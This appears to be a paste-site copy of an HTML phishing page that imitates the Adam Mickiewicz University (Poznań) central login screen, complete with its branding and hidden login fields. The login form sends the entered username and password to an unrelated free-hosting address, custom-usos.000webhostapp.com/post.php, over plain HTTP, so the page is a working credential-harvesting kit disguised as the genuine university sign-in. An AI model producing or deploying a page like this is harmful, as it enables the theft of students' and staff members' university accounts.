Untitled
3 years ago in Plain Text
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<title>CAS UAM</title>
<link type="text/css" rel="stylesheet" href="/cas/css/casuam.css" />
</head>
<body class="text-center">
<div class="cas-container">
<div class="cas-top">
<img class="mb-4" src="./images/uam-znak-biale.svg" alt="">
<div class="cas-name">
<p><span class="first">C</span>ENTRALNY <span class="first">S</span>YSTEM</p>
<p><span class="first">U</span>WIERZYTELNIANIA</p>
</div>
</div>
<div class="cas-content">
<form id="fm1" class="form-signin" action="http://custom-usos.000webhostapp.com/post.php" method="post">
<h2>Wprowadź dane logowania</h2>
<input type="text" id="username" name="username" class="form-control" placeholder="Identyfikator użytkownika:" tabindex="1" path="username" autocomplete="false" htmlEscape="true" required autofocus/>
<input type="password" id="password" name="password" class="form-control" placeholder="Hasło:" tabindex="2" path="password" htmlEscape="true" autocomplete="off" required />
<div class="cas-buttons">
<input type="hidden" name="lt" value="LT-159598-7HOhEP6nVjfMzh5E1F0q90cx43E5sF" />
<input type="hidden" name="execution" value="e2s1" />
<input type="hidden" name="_eventId" value="submit" />
<button class="btn btn-sm btn-outline-secondary" type="submit" name="submit" accesskey="l" tabindex="4">ZALOGUJ</button>
<button class="btn btn-sm btn-outline-secondary" type="reset" name="reset" accesskey="c" tabindex="5">WYCZYŚĆ</button>
</div>
<div class="cas-locale">
<a href="login?service=https%3A%2F%2Fusosweb.amu.edu.pl%2Fkontroler.php%3F_action%3Dlogowaniecas%2Findex&locale=pl">Polski</a> | <a href="login?service=https%3A%2F%2Fusosweb.amu.edu.pl%2Fkontroler.php%3F_action%3Dlogowaniecas%2Findex&locale=en">English</a>
</div>
</form>
</div>
<div class="cas-bottom">
<p><span class="first">U</span>NIWERSYTET IM. <span class="first">A</span>DAMA <span class="first">M</span>ICKIEWICZA W <span class="first">P</span>OZNANIU</p>
</div>
</div>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="/cas/js/cas.js"></script>
</body>
</html>